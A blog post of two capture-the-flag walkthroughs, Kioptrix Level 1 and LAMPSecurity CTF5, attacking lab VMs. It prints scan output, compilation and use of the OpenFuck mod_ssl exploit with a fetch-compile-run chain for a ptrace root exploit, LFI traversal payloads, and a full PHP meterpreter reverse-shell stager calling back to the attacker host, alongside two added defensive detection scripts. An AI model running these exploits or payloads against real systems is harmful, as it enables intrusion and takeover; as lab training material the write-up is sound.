Sunday, November 15, 2015

Tango Down (Kioptrix1) : Kioptrix Level 1 (#1) Challenge Walkthrough


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ on VirtualBox
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below

Discovery : Changed the VM's network setting to host-only and ran an nmap scan

root@kali:~/tools/practice/bash/lab# nmap -sT 192.168.56.1-254

Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-27 23:09 GMT
Nmap scan report for 192.168.56.1
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmap scan report for 192.168.56.100
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:BD:93:7E (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
32768/tcp open  filenet-tms
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.110
Host is up (0.00030s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 254 IP addresses (4 hosts up) scanned in 15.41 seconds

Additional Scan

root@kali:~/tools/practice/bash/lab# nmap -v -sS -sV -O 192.168.56.101

Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-27 23:14 GMT
NSE: Loaded 29 scripts for scanning.
Initiating ARP Ping Scan at 23:14
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 23:14, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:14
Completed Parallel DNS resolution of 1 host. at 23:14, 0.02s elapsed
Initiating SYN Stealth Scan at 23:14
Scanning 192.168.56.101 [1000 ports]
Discovered open port 443/tcp on 192.168.56.101
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 22/tcp on 192.168.56.101
Discovered open port 111/tcp on 192.168.56.101
Discovered open port 80/tcp on 192.168.56.101
Discovered open port 32768/tcp on 192.168.56.101
Completed SYN Stealth Scan at 23:14, 0.34s elapsed (1000 total ports)
Initiating Service scan at 23:14
Scanning 6 services on 192.168.56.101
Completed Service scan at 23:14, 12.08s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSE at 23:14
Completed NSE at 23:14, 0.04s elapsed
Nmap scan report for 192.168.56.101
Host is up (0.00031s latency).
Not shown: 994 closed ports

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: 9DMYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Tue Oct 27 23:08:14 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IPID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.50 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1018 (41.493KB)

So some vectors we see from above are :
  • SSH Server
  • Web Server (http,https)
  • Samba Server
  • NFS Server, Portmapper (111)
Tried accessing the web server:


Seems like a Red Hat server.


Let's run some Nmap NSE scripts:

-- Tried the http NSE scripts - no results
-- Tried the SMB NSE scripts, including smb-vulns-scan -- nothing interesting


Vulnerability Assessment and Exploit :
Run Nikto:

root@kali:~/vulhub/kioptrix1.0# nikto -h 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-27 23:33:56 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 04:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 10 error(s) and 18 item(s) reported on remote host
+ End Time: 2015-10-27 23:40:54 (GMT0) (418 seconds)
---------------------------------------------------------------------------
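As an added defensive check that is not part of this walkthrough, the script below parses the Server banner from the Nikto output above and applies the three version thresholds Nikto stated, so the same exposure can be flagged from an inventory of collected headers without rescanning; the banner string is copied from the Nikto line, the helper names are my own.

```python
"""Flag vulnerable Apache 1.3 / mod_ssl versions from a raw Server header.
The thresholds and advisory ids are the ones stated in the Nikto output.
Added example; not code from the walkthrough or from Nikto."""
import re

# Banner copied from the Nikto output for 192.168.56.101.
KIOPTRIX_SERVER_HEADER = "Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"

# (component name as it appears in the banner, predicate on the numeric
#  version tuple, advisory text taken from the Nikto findings)
CHECKS = [
    ("mod_ssl", lambda v: v <= (2, 8, 7),
     "mod_ssl 2.8.7 and lower: remote buffer overflow, CVE-2002-0082 / OSVDB-756"),
    ("Apache", lambda v: v[:2] == (1, 3) and v < (1, 3, 27),
     "Apache 1.3 below 1.3.27: local buffer overflow, CAN-2002-0839 / OSVDB-4552"),
    ("Apache", lambda v: v[:2] == (1, 3) and v < (1, 3, 29),
     "Apache 1.3 below 1.3.29: mod_rewrite/mod_cgi overflows, CAN-2003-0542 / OSVDB-2733"),
]


def parse_version(text):
    """'1.3.20' -> (1, 3, 20). A letter suffix such as in '0.9.6b' is dropped
    because only the numeric part is compared against the thresholds."""
    return tuple(int(n) for n in re.findall(r"\d+", text))


def parse_server_header(header):
    """Return {component: version_tuple} for every Name/version token.
    Platform tokens such as (Red-Hat/Linux) are skipped because what
    follows their slash does not start with a digit."""
    return {name: parse_version(ver)
            for name, ver in re.findall(r"([A-Za-z_]+)/(\d[\w.]*)", header)}


def audit_server_header(header):
    """Return the advisory strings whose version predicate matches."""
    components = parse_server_header(header)
    return [advisory for name, is_vulnerable, advisory in CHECKS
            if name in components and is_vulnerable(components[name])]


if __name__ == "__main__":
    for finding in audit_server_header(KIOPTRIX_SERVER_HEADER):
        print("[!]", finding)
```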

Found some vulnerabilities as above. Searching for CVE-2002-0082 gives you the link below :

https://www.exploit-db.com/exploits/764/

Once you download this, you need to compile and execute it :

root@kali:~/vulhub/kioptrix1.0# ls
764.c http-nse.txt smb-nse.txt

root@kali:~/vulhub/kioptrix1.0# gcc 764.c -o openfk
764.c:651:2: error: unknown type name ‘RC4_KEY’
764.c:652:2: error: unknown type name ‘RC4_KEY’
764.c: In function ‘read_ssl_packet’:
764.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c:844:7: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘send_ssl_packet’:
764.c:882:2: error: unknown type name ‘MD5_CTX’
764.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘get_server_hello’:
764.c:1009:2: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type [enabled by default]
In file included from /usr/include/openssl/ssl.h:156:0,
from 764.c:20:
/usr/include/openssl/x509.h:840:1: note: expected ‘const unsigned char **’ but argument is of type ‘unsigned char **’
764.c: In function ‘generate_key_material’:
764.c:1106:2: error: unknown type name ‘MD5_CTX’
764.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘generate_session_keys’:
764.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764.c:1127:31: error: expected expression before ‘)’ token
764.c:1131:32: error: expected expression before ‘)’ token

It is very likely that you will get the above errors while compiling. After hours of searching I found the link below, which helps fix the problem... (I so wish I knew C programming)

http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
Here are the steps to make this work :

1) Add those headers :

#include
#include

2) Update the URL in the C file.

Search for wget and replace the URL with this new one :
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Get the libssl-dev library

Install it : apt-get install libssl-dev

4) Update the declaration of variables

Line 961, change : unsigned char *p, *end;
by adding const : const unsigned char *p, *end;

5) Compile the code and you’re done

To compile :
gcc -o OpenFuck 764.c -lcrypto

root@kali:~/vulhub/kioptrix1.0# gcc openfk.c -o openfk -lcrypto

root@kali:~/vulhub/kioptrix1.0# ls -l
total 140
-rw-r--r-- 1 root root 33617 Oct 27 23:39 764.c
-rw-r--r-- 1 root root 2289 Oct 27 23:23 http-nse.txt
-rwxr-xr-x 1 root root 60991 Oct 27 23:47 openfk
-rw-r--r-- 1 root root 33684 Oct 27 23:46 openfk.c
-rw-r--r-- 1 root root 351 Oct 27 23:24 smb-nse.txt
root@kali:~/vulhub/kioptrix1.0# ./openfk

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

: Usage: ./openfk target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
++++ Truncated ++++++++++++++++++

Now for the targets, the closest match to the version reported by nmap is below :
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

nmap output : 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)


Running the exploit
root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6a 192.168.56.101 443 -c 50

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a did not give us a shell, let's try the other one... 0x6b



root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6b 192.168.56.101 443 -c 50


Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ hostname
hostname
kioptrix.level1
bash-2.05$ uname -a
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
bash-2.05$ cat /etc/release
cat /etc/release
cat: /etc/release: No such file or directory
bash-2.05$ cat /etc/issue
cat /etc/issue
Welcome to Kioptrix Level 1 Penetration and Assessment Environment

--The object of this game:
|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to
appreciate this exercise.

DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)

Good luck and have fun!

bash-2.05$ Good Bye!

Now we are in and have a shell. Time to escalate our privileges.

Privilege Escalation
When we run the exploit above, we see that it tries to download ptrace-kmod.c to give us a root shell; however, that doesn't happen.

exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'

What we can do is download this file manually on the attacking host :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Once you download it, compile it. When I compile it on my Kali node, below is what I get:

root@kali:~/vulhub/kioptrix1.0# gcc 895.c -o privesc1
895.c:80:1: warning: missing terminating " character [enabled by default]
895.c:80:1: error: missing terminating " character
895.c:81:1: error: stray ‘\’ in program
895.c:81:1: error: stray ‘\’ in program
895.c:81:2: error: ‘x00’ undeclared here (not in a function)
895.c:81:6: error: expected ‘,’ or ‘;’ before ‘x00’
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program

This is full of errors, probably because of a newer compiler version. What I did instead was transfer the C file from my attacking node to the victim node and compile it there, since the victim has the older toolchain. After compilation I ran the binary:

bash-2.05$ wget http://192.168.56.110/ptrace-kmod.c

wget http://192.168.56.110/ptrace-kmod.c
--00:05:36-- http://192.168.56.110/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.110:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 3.74 MB/s

00:05:36 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

bash-2.05$ ls
ls
895.c
ptrace-kmod.c
bash-2.05$ gcc ptrace-kmodc -o ptrace
gcc ptrace-kmodc -o ptrace
gcc: ptrace-kmodc: No such file or directory
gcc: No input files
bash-2.05$ gcc ptrace-kmodc.c -o ptrace
gcc ptrace-kmodc.c -o ptrace
gcc: ptrace-kmodc.c: No such file or directory
gcc: No input files
bash-2.05$ gcc ptrace-kmod.c -o ptrace
gcc ptrace-kmod.c -o ptrace
bash-2.05$ ls
ls
895.c
ptrace
ptrace-kmod.c
bash-2.05$ chmod +x ptrace
chmod +x ptrace
bash-2.05$ ./ptrace
./ptrace
[+] Attached to 6416
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...


id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


We are now root on the node.


Sunday, November 1, 2015

Tango Down (CTF5) : Capture The Flag (CTF) 5 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf5,84/ on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

Install the image

Run a network scan on the range :
root@kali:~/vulhub/ctf5# nmap -sT 192.168.56.1-254
Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-31 00:22 GMT
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmap scan report for 192.168.56.100
Host is up (0.000079s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:79:AC:8C (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
901/tcp  open  samba-swat
3306/tcp open  mysql
MAC Address: 08:00:27:C3:02:2B (Cadmus Computer Systems)


Nmap scan report for 192.168.56.110
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 254 IP addresses (4 hosts up) scanned in 15.32 seconds


Possible vectors are :

  • Webserver
  • Mail (IMAP,POP)
  • NFS, Portmapper
  • netbios
  • samba
  • mysql


Assessing the webserver:
Open the link in the browser (http://192.168.56.101)

It gives us the default Linux Apache page :






I just tried different paths,

e.g. index.php... which gives the below :




When I click blog I get :



When I go back and click contact :



Go back and click Events



Now we see this has different web apps installed.

Now on the blog page, clicking the links in the navigation pane, I got the following: Webmail




Admin Login





Vulnerability Assessment and Exploit :

The SquirrelMail version had 2 known vulnerabilities :
root@kali:/var/www# searchsploit squirrel | grep 1.4.x
SquirrelMail 1.4.x Folder Name Cross-Site Scripting Vulnerability | /php/webapps/24068.txt
Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability | /php/webapps/27948.txt

Tried them :
Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability :



SquirrelMail 1.4.x Folder Name Cross-Site Scripting Vulnerability

Same as above, no luck..

Now let's run Nikto to see if we can get some more :

root@kali:~/tools/practice/bash/lab# nikto -h http://192.168.56.101

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-31 21:18:00 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.

+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 557285, size: 5108, mtime: Fri Jun 19 19:31:28 1998
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found

+ 7355 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2015-10-31 21:18:37 (GMT0) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So now we have some more vectors.

Trying the paths below one by one :
/index.php?page=../../../../../../../../../../etc/passwd << as reported by Nikto, no luck





We removed the path and saw what comes up. As we see above, the application also appends a .php suffix, so we need to append a null byte to terminate the string before the .php gets added.

Now keep adding ../ in front of etc/passwd until we get some results.


Bang, we see the LFI succeed.
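To look at the Nikto findings and the manual LFI test from the defender's side, here is an added example (not code from the walkthrough or from the CTF5 application) that flags those probe patterns in Apache access-log lines and shows the allowlist lookup that removes the include bug; the log lines are constructed and the page names in ALLOWED_PAGES are assumed.

```python
"""Spot the file-inclusion probes seen in the Nikto output and the manual
LFI test in Apache access-log lines, and show the allowlist check that
removes the bug. Added example, not code from the walkthrough or from the
CTF5 application; the log lines are constructed and ALLOWED_PAGES is assumed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache combined-log format. The query strings
# mirror the walkthrough's probes: plain traversal, traversal ending in a
# null byte, and a remote URL in the page parameter.
SAMPLE_LOG = """\
192.168.56.110 - - [31/Oct/2015:21:18:05 +0000] "GET /index.php?page=blog HTTP/1.1" 200 2890 "-" "Mozilla/5.0"
192.168.56.110 - - [31/Oct/2015:21:18:06 +0000] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Nikto/2.1.6)"
192.168.56.110 - - [31/Oct/2015:21:18:07 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1812 "-" "Mozilla/5.0"
192.168.56.110 - - [31/Oct/2015:21:18:08 +0000] "GET /index.php?page=http://cirt.net/rfiinc.txt? HTTP/1.1" 200 88 "-" "Mozilla/5.0 (Nikto/2.1.6)"
192.168.56.110 - - [31/Oct/2015:21:18:09 +0000] "GET /index.php?page=contact HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

TRAVERSAL = re.compile(r'(?:^|[/\\])\.\.(?:[/\\]|$)')
REMOTE_URL = re.compile(r'(?i)^(?:https?|ftp)://')
PHP_WRAPPER = re.compile(r'(?i)^(?:php|data|expect|phar):')


def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so that %2e%2e%2f and
    double-encoded %252e are compared in the same form as plain text."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_param(value):
    """Return the probe type for one parameter value, or None if benign.
    The null-byte check comes first: it is what made the .php suffix drop
    off in the walkthrough, so it is the strongest signal."""
    v = decode_fully(value)
    if "\x00" in v:
        return "null-byte"
    if TRAVERSAL.search(v):
        return "traversal"
    if REMOTE_URL.match(v):
        return "remote-include"
    if PHP_WRAPPER.match(v):
        return "php-wrapper"
    return None


def scan_log(text):
    """Return (ip, path, parameter, probe_type) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            kind = classify_param(value)
            if kind:
                hits.append((m.group("ip"), url.path, name, kind))
    return hits


# Assumed page names; the real CTF5 application's list is not on the page.
ALLOWED_PAGES = {"home", "blog", "contact", "events"}


def resolve_page(param):
    """The fix for the include bug: look the raw parameter up in a fixed
    allowlist and build the path from the allowlisted name only. Nothing
    supplied by the client reaches include(), so traversal, null bytes and
    URLs are never interpreted."""
    if param in ALLOWED_PAGES:
        return "pages/%s.php" % param
    return None


if __name__ == "__main__":
    for ip, path, name, kind in scan_log(SAMPLE_LOG):
        print("%s %s?%s= -> %s" % (ip, path, name, kind))
```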

Now we try to fetch some more information, e.g. the MySQL config:



[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1

[mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

Try viewing access_log :




Another vector was NanoCMS




Using Google :



http://www.securityfocus.com/bid/34508/exploit

When we try this :





For us the key from above is :
"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

Now cracking the password :





Now let's try to access the portal: we managed to log in to the admin panel




Now we see that we have an option to create a new page using the admin panel.

My steps would be :

1- Create a PHP payload on my KALI host
2- Create a page on NanoCMS and paste the code into it
3- Open a handler on my KALI host
4- Open the shellcode page
5- We should get our meterpreter session on our KALI host

Let's try it now.


Step 1 :

root@kali:/var/www# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.56.110 LPORT=4444 R > malicious.php
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
root@kali:/var/www# vi malicious.php
root@kali:/var/www# cat malicious.php
#
error_reporting(0);
# The payload handler overwrites this with the correct LHOSTbefore sending
# it to the victim.
$ip= '192.168.56.110';
$port = 4444;
$ipf= AF_INET;

if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip= "[". $ip."]";
$ipf= AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif(($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif(($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) {
case 'stream': $len= fread($s, 4); break;
case 'socket': $len= socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len= $a['len'];

$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();


Step 2 :




Step 3:
msf exploit(udev_netlink) > use exploit/multi/handler
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


